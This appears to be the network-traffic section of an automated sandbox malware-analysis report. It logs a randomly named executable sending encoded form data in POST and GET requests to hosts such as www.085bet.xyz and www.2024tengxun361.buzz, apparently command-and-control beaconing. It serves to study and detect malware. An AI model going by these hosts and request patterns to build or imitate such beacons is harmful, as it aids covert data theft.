                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.085bet.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.085bet.xyz/1zd7/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 57 41 64 34 4c 6d 4f 56 69 4b 6b 45 55 7a 62 4e 76 74 4a 6a 70 61 66 54 47 75 49 4a 6d 59 63 6b 7a 38 4b 71 73 45 72 7a 52 55 6c 56 30 4e 30 31 67 62 41 50 49 76 71 48 47 75 73 4b 33 34 51 75 45 4f 50 76 49 31 34 37 50 67 76 35 4e 4d 30 5a 45 74 64 58 74 74 58 72 7a 59 74 58 4c 5a 6f 37 45 35 75 36 34 4f 54 69 47 49 45 55 43 46 54 55 53 78 57 55 52 7a 61 4a 67 44 54 56 5a 45 77 4a 58 34 70 35 70 53 75 7a 36 79 55 63 36 63 69 62 4d 43 47 43 32 72 62 75 68 67 49 78 74 45 4c 4c 2f 39 53 6f 56 43 7a 2f 65 7a 79 46 62 55 57 52 44 63 32 66 64 7a 48 66 77 5a 34 36 4a 52 46 48 6b 6e 34 58 67 4e 47 35 42 49 38 5a 77 36 2b 77 58 42 44 62 6f 58 4e 49 4b 6f 4e 56 4b 55 48 78 39 31 52 4c 78 45 55 3d
                                Data Ascii: 76=WAd4LmOViKkEUzbNvtJjpafTGuIJmYckz8KqsErzRUlV0N01gbAPIvqHGusK34QuEOPvI147Pgv5NM0ZEtdXttXrzYtXLZo7E5u64OTiGIEUCFTUSxWURzaJgDTVZEwJX4p5pSuz6yUc6cibMCGC2rbuhgIxtELL/9SoVCz/ezyFbUWRDc2fdzHfwZ46JRFHkn4XgNG5BI8Zw6+wXBDboXNIKoNVKUHx91RLxEU=
                                Sep 23, 2024 14:39:57.104795933 CEST729INHTTP/1.1 405 Method Not Allowed
                                Content-Type: text/html
                                Date: Mon, 23 Sep 2024 12:39:56 GMT
                                Server: openresty
                                X-Cache: BYPASS
                                Content-Length: 556
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                47192.168.2.749751154.198.53.36803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:58.801799059 CEST1767OUTPOST /1zd7/ HTTP/1.1
                                Host: www.085bet.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.085bet.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.085bet.xyz/1zd7/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 57 41 64 34 4c 6d 4f 56 69 4b 6b 45 55 7a 62 4e 76 74 4a 6a 70 61 66 54 47 75 49 4a 6d 59 63 6b 7a 38 4b 71 73 45 72 7a 52 53 39 56 30 2b 73 31 67 35 6f 50 50 76 71 48 46 75 73 48 33 34 51 76 45 4f 58 72 49 31 38 72 50 69 6e 35 4e 70 67 5a 50 2f 6c 58 6b 74 58 72 2f 34 74 61 42 35 6f 79 45 35 65 2b 34 4f 6a 69 47 49 45 55 43 44 2f 55 62 46 43 55 58 7a 61 4b 6a 44 54 52 54 6b 78 63 58 34 68 70 70 52 43 38 36 44 30 63 36 38 53 62 4f 78 2b 43 39 72 62 73 69 67 49 70 74 45 58 45 2f 39 66 45 56 47 79 59 65 78 69 46 62 7a 6d 47 5a 73 32 43 4a 56 4b 44 36 62 30 42 48 78 56 6d 71 6b 6b 52 68 73 6e 65 43 71 77 6e 35 38 65 2f 46 6e 58 62 77 46 4e 62 50 39 52 42 46 44 4f 30 6b 67 5a 68 74 69 56 78 71 30 6f 49 4e 69 68 61 63 34 77 65 4e 39 58 30 68 2f 58 31 72 74 44 77 33 31 76 54 65 6c 41 7a 73 75 54 76 64 7a 6b 62 72 43 79 61 51 58 65 6f 43 4a 2f 77 54 4c 4b 2b 32 76 31 66 37 43 56 34 51 74 45 47 59 39 47 59 42 36 6e 47 78 65 4a 38 4d 32 59 70 4d 65 65 49 4a 4f 56 59 76 6b 64 30 65 66 38 79 51 45 75 [TRUNCATED]
                                Data Ascii: 76=WAd4LmOViKkEUzbNvtJjpafTGuIJmYckz8KqsErzRS9V0+s1g5oPPvqHFusH34QvEOXrI18rPin5NpgZP/lXktXr/4taB5oyE5e+4OjiGIEUCD/UbFCUXzaKjDTRTkxcX4hppRC86D0c68SbOx+C9rbsigIptEXE/9fEVGyYexiFbzmGZs2CJVKD6b0BHxVmqkkRhsneCqwn58e/FnXbwFNbP9RBFDO0kgZhtiVxq0oINihac4weN9X0h/X1rtDw31vTelAzsuTvdzkbrCyaQXeoCJ/wTLK+2v1f7CV4QtEGY9GYB6nGxeJ8M2YpMeeIJOVYvkd0ef8yQEuq/fUAk8dcfrb0xGiykwM8JAoQZcjT4KKz7QzlSBMJCNsm7r8jQXR6otifxVuhTTRk6OHRTKN131a8kjNKgWKssZMPnilLW9IJ2a4uPx5rMArRP5p7Qx+tgke0REvNqCkOVbc7IRjT5GGPeQdZj9ihjkAo2w5erSlA+/Ojj4kWjCMVoacQdD/Ho3uvo9WyQ/6BCswOQYbFp5Qquk1D8FGComwEBqOc00J/8laUdyN32xLZELW5MfSfw+4DIS7uxpbOx3SHL5+bNw2HKBmDTqwY5UAIJ6D1OnbNgAdJp2WJv0myVZ7o+Vzei23ZnJyToeolYFtG2p7nQPh/+Fw7C1iahL6fFusMeYNsbYCHHchThzXCoLzotppDAT0lLMe9nY5tzRt5dS97F/2Br83KWljuHQ7/4SXp5oiYSr1HqNd8/b2knHx2Cf1JsuPnRLrg4daXGXoGr7gXYuIHa2Pt+56jnmDaxZKM59hfaLPpauSsDSLraNX0HvOhG3cW6bNO/L+tYE5WgI9E8f44dIXlULvSh/Gr0jKmeaeRffkw1p70Fdah2oxsKcZr9UWjl3aT+gAtTLDdAsHnWsWzzltMeiYLkVaLsrkd7hyZXuSBN/GZkLgpCmiV0Dlao0ZYCImuE1AKVRUVmNrk7H7eXSw8UyjX8YQdy1YwgnW7L [TRUNCATED]
                                Sep 23, 2024 14:39:59.933331966 CEST729INHTTP/1.1 405 Method Not Allowed
                                Content-Type: text/html
                                Date: Mon, 23 Sep 2024 12:39:59 GMT
                                Server: openresty
                                X-Cache: BYPASS
                                Content-Length: 556
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                48192.168.2.749752154.198.53.36803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:40:01.342526913 CEST475OUTGET /1zd7/?76=bC1YIRSSuZYlVnS9hsNuhorKbcQ6ntdnx8KhpmCqECpWzN5SjPNMNLi+QdUYzo4UT/zMJg8CHwvIOMobHOZol4uZ599UMLQvIcSN6ebgMaMOQVLVUFO0QXCtqgKNb3wKU9pkkDiIxWQO&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.085bet.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:40:02.265130997 CEST1236INHTTP/1.1 200 OK
                                Access-Control-Allow-Origin: *
                                Content-Type: text/html
                                Date: Mon, 23 Sep 2024 12:40:02 GMT
                                Server: openresty
                                Vary: Accept-Encoding
                                X-Cache: BYPASS
                                Connection: close
                                Transfer-Encoding: chunked
                                Data Raw: 31 66 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 20 64 61 74 61 2d 62 75 69 6c 64 74 69 6d 65 3d 22 37 2f 31 34 2f 32 30 32 34 2c 20 32 31 3a 32 37 3a 32 37 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6e 65 78 74 2d 66 6f 6e 74 2d 70 72 65 63 6f 6e 6e 65 63 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 63 65 2d 72 65 6e 64 65 72 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 68 2d 43 4e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 [TRUNCATED]
                                Data Ascii: 1f1e<!DOCTYPE html><html lang="zh-CN" data-buildtime="7/14/2024, 21:27:27"> <head> <meta charset="utf-8"> <title></title> <meta name="next-font-preconnect"> <meta name="renderer" content="webkit"> <meta name="force-rendering" content="webkit"> <meta http-equiv="Content-Language" content="zh-CN"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="theme-color" content="#fff"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-touch-fullscreen" content="yes"> <meta name="referrer" content="origin"> <meta name="x5-orientation" content="portrait"> <meta name="google" content="notranslate"> <meta name="screen-orientation" content="portrait"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cover"> ... --> <style> .con { width: 100% [TRUNCATED]
                                Sep 23, 2024 14:40:02.265156031 CEST1236INData Raw: 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 63 6d 73 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 20 20
                                Data Ascii: height: 100%; background: var(--cms-primary-background-color); position: fixed; left: 0; top: 0; display: flex; justify-content: center; align-items: center; } .loading {
                                Sep 23, 2024 14:40:02.265162945 CEST1236INData Raw: 20 20 20 20 2e 61 6e 74 69 63 6f 6e 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 63 69 72 63 6c 65 2c 0a 20 20 20 20 20 20 2e 61 6e 74 69 63 6f 6e 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 20 7b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f
                                Data Ascii: .anticon-exclamation-circle, .anticon-check-circle { display: none !important; } .ant-message-error .anticon { background: #cf2f22 !important; color: white !important; border-radius: 16px;
                                Sep 23, 2024 14:40:02.265726089 CEST672INData Raw: 28 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 20 28 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 20 22 5f 54 5f 22 2c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 66 69 67 75 72 61
                                Data Ascii: () : (t.defineProperty(t.prototype, "_T_", { configurable: !0, get: e, }), _T_)); })(Object); </script> <script> window.CONFIG={"name":"kc352-1","
                                Sep 23, 2024 14:40:02.265733957 CEST1236INData Raw: 61 74 69 6f 6e 22 3a 22 6d 69 6e 65 22 7d 5d 2c 22 6d 6f 62 69 6c 65 4d 69 6e 65 53 77 69 74 63 68 4c 69 73 74 22 3a 5b 22 67 72 78 78 22 2c 22 67 72 7a 6c 22 2c 22 77 64 78 78 22 2c 22 7a 6a 6d 78 22 2c 22 63 7a 64 64 22 2c 22 74 78 64 64 22 2c
                                Data Ascii: ation":"mine"}],"mobileMineSwitchList":["grxx","grzl","wdxx","zjmx","czdd","txdd","zdxq","sssz","ssgg","bsjg","zzxx","dlzq","yuebao","jiebei"],"sportConfig":{"svgSpriteName":"template_2","templateName":"template_2"},"isAgent":false}; </scr
                                Sep 23, 2024 14:40:02.265742064 CEST1236INData Raw: 6e 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e
                                Data Ascii: n.preventDefault(); // }); // document.documentElement.addEventListener("touchend", function (n) { // var e = new Date().getTime(); // e - o <= 300 && n.preventDefault(); // o = e;
                                Sep 23, 2024 14:40:02.265758991 CEST1236INData Raw: 31 2f 6a 73 2f 63 6d 73 2d 73 70 6f 72 74 73 2e 34 37 34 31 63 64 37 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 2f 31 2f 6a 73 2f 69 6e 64 65 78 2e 36 39 39 34 66
                                Data Ascii: 1/js/cms-sports.4741cd7f.js"></script><script defer="defer" src="/1/js/index.6994fc26.js"></script><link href="/1/css/chunk-vendors.09a194bd.css" rel="stylesheet"><link href="/1/css/cms-sports.d427b88f.css" rel="stylesheet"></head> <body>
                                Sep 23, 2024 14:40:02.265764952 CEST104INData Raw: 20 65 6c 65 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 69 74 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 6c 65 29 3b 0a 20 20 20 20 20 20 7d 29 3b
                                Data Ascii: ele.innerHTML = item; } document.body.appendChild(ele); }); } }</script>
                                Sep 23, 2024 14:40:02.265772104 CEST6INData Raw: 0a 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                49192.168.2.749753154.38.114.205803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:40:07.496037960 CEST761OUTPOST /xedw/ HTTP/1.1
                                Host: www.2024tengxun361.buzz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.2024tengxun361.buzz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.2024tengxun361.buzz/xedw/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 76 57 55 61 59 4f 76 42 4e 46 51 46 30 47 6a 71 6e 48 49 6c 6c 69 77 2f 70 68 6b 51 44 5a 69 6f 32 37 38 75 69 72 35 31 39 43 57 31 49 75 6b 71 6d 44 4e 49 43 6e 56 58 30 6d 30 63 51 48 68 52 35 38 56 32 54 51 4b 66 75 52 51 73 41 6e 38 66 39 35 46 71 74 7a 77 53 66 6e 4a 6a 59 61 39 7a 37 44 4e 77 74 47 4b 66 2b 65 50 38 75 70 44 2b 70 58 48 52 5a 68 6a 6b 64 4e 36 55 62 69 43 4b 4a 74 56 78 47 55 2f 64 73 4d 6f 45 32 56 77 6b 7a 75 31 56 6e 5a 77 44 4d 70 56 72 35 57 53 6b 4f 6e 6f 64 43 47 53 51 7a 2f 30 6d 37 36 75 50 71 62 51 5a 56 33 5a 34 33 64 32 76 39 74 38 6d 76 53 46 7a 30 45 46 48 4c 6e 41 50 37 31 50 43 4f 77 3d 3d
                                Data Ascii: 76=vWUaYOvBNFQF0GjqnHIlliw/phkQDZio278uir519CW1IukqmDNICnVX0m0cQHhR58V2TQKfuRQsAn8f95FqtzwSfnJjYa9z7DNwtGKf+eP8upD+pXHRZhjkdN6UbiCKJtVxGU/dsMoE2Vwkzu1VnZwDMpVr5WSkOnodCGSQz/0m76uPqbQZV3Z43d2v9t8mvSFz0EFHLnAP71PCOw==
                                Sep 23, 2024 14:40:08.418097019 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:08 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Data Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 [TRUNCATED]
                                Data Ascii: 7b6X[~`d[jn{fm~%@}$jDD$5;AAmP />0`3_qvft]Iy{g"?}0m/$LO_Tl1)UI=O3OaL/b:5tI\0%"y.=4tW-=/slo0biFr_$1F>h?C3Oe 64b2I7$|TCV)Oo+p:g~~!^Xd|DB&FBFgLv_tMq$Np,4B1&8>pvK">{QMq))&Q$1II1X$'4I1-0xW,JHQbU<JKXUxA$08Iq<TCAxN'8&fc"5s0G1 yp[%2((0' r5X&U^02g<%o349$gsDDQ&H|f$pltO_7:a*s4uhEaq~F<dl-L>IWJ3BHKYK<h}#LiXe]J>#KS+u*2n}tr0O:_YrW]`$'h9sIV`B"%Wj@~B+{x{$H{0cAV"c2_oWo>`$W>KLBx PwBauh2M46:a6ecr8Rd-IYByuG>~)pA [TRUNCATED]
                                Sep 23, 2024 14:40:08.418113947 CEST962INData Raw: 61 27 08 da 00 a0 6e 41 dd 78 6d 1b 88 06 4d 88 7c 73 25 50 7f 10 b5 86 e4 25 49 58 a5 82 09 d4 a1 45 5e 4d 22 ad 65 a6 27 64 24 11 e7 c1 08 8d d0 de a8 5c 22 39 8f c8 a3 93 13 5c ff 1f 0d 46 87 8f 3b 7e 3a 80 09 ae c9 b1 c8 85 0c 1e a6 69 ea 16
                                Data Ascii: a'nAxmM|s%P%IXE^M"e'd$\"9\F;~:iy_WfA+M:8}O&fQ3bgc3'jGBv`8Z[f(t&vpoH-6)5D!lx9h96{4T6WgoQbKg@j9:XoPJ


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                50192.168.2.749754154.38.114.205803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:40:10.033812046 CEST781OUTPOST /xedw/ HTTP/1.1
                                Host: www.2024tengxun361.buzz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.2024tengxun361.buzz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.2024tengxun361.buzz/xedw/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 76 57 55 61 59 4f 76 42 4e 46 51 46 37 48 54 71 6b 6b 77 6c 30 53 77 38 73 68 6b 51 4a 35 6a 76 32 37 67 75 69 76 49 71 38 77 79 31 49 50 55 71 6e 42 70 49 48 6e 56 58 73 32 30 54 65 6e 68 61 35 38 59 42 54 55 4f 66 75 56 34 73 41 69 41 66 39 4b 39 70 72 6a 77 63 55 48 4a 74 56 36 39 7a 37 44 4e 77 74 47 75 31 2b 65 58 38 76 5a 54 2b 71 30 66 57 61 68 6a 6a 61 4e 36 55 66 69 43 47 4a 74 55 55 47 52 6e 7a 73 4f 51 45 32 58 34 6b 7a 63 4e 53 74 5a 77 46 43 4a 56 30 30 30 4c 57 4b 6c 63 59 61 33 33 4a 78 59 77 34 36 4d 7a 74 77 35 63 31 4c 6d 68 44 7a 66 53 5a 71 4c 68 54 74 54 42 72 35 6d 78 6d 55 51 6c 6c 32 6e 75 47 59 41 4b 70 2b 6a 33 63 62 4e 4d 49 35 65 72 42 36 4f 30 6a 61 32 45 3d
                                Data Ascii: 76=vWUaYOvBNFQF7HTqkkwl0Sw8shkQJ5jv27guivIq8wy1IPUqnBpIHnVXs20Tenha58YBTUOfuV4sAiAf9K9prjwcUHJtV69z7DNwtGu1+eX8vZT+q0fWahjjaN6UfiCGJtUUGRnzsOQE2X4kzcNStZwFCJV000LWKlcYa33JxYw46Mztw5c1LmhDzfSZqLhTtTBr5mxmUQll2nuGYAKp+j3cbNMI5erB6O0ja2E=
                                Sep 23, 2024 14:40:11.121341944 CEST1236INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:40:10 GMT
                                Content-Type: text/html; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Data Raw: 37 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 5b 8f dc b6 15 7e f7 af 60 64 04 b0 5b 6a 6e 7b 97 66 16 6d dd a6 7e e8 25 40 dc 87 00 7d a1 24 6a 44 af 44 ca 24 35 3b e3 41 81 be 14 05 0a 04 41 00 17 6d 91 de f2 50 20 2f ed 3e 15 30 60 a4 fd 33 bb ad f7 5f f4 90 ba 71 76 66 e3 dd 74 ed 5d 49 14 79 ae df f9 0e c5 e9 7b df ff e9 93 67 1f 7f f8 03 94 e9 22 3f 7d 30 6d 2f 94 24 a7 0f 10 fc 4c 0b aa 09 bc d5 a5 4f 5f 54 6c 31 f3 9e 08 ae 29 d7 fe b3 55 49 3d 14 d7 4f 33 4f d3 a5 1e 9a e5 61 9c 11 a9 a8 9e fd ec d9 07 fe b1 d7 88 d1 4c e7 f4 f4 ea d3 cf fe fb ea 2f d7 af fe f0 f6 e2 62 3a ac c7 1c 35 9c 14 74 e6 49 11 09 ad 1c d1 5c 30 9e d0 25 e6 22 15 79 2e ce 3d 34 74 8d ab 57 2d 18 3d 2f 85 d4 ce ba 73 96 e8 6c 96 d0 05 8b a9 6f 1f 30 62 9c 69 46 72 5f c5 24 a7 b3 31 46 95 a2 d2 3e 91 08 06 b8 68 0d ce 19 3f 43 92 e6 33 4f 65 20 36 ae 34 62 e0 ac 87 32 49 d3 99 37 24 0a 7c 54 43 56 cc 87 29 01 0d 82 0f e0 4f 6f 9a d2 2b 70 d8 3a 67 7e be 85 d6 7e 21 5e fa 91 58 fa 8a bd 64 7c 1e 44 42 26 a0 1b 46 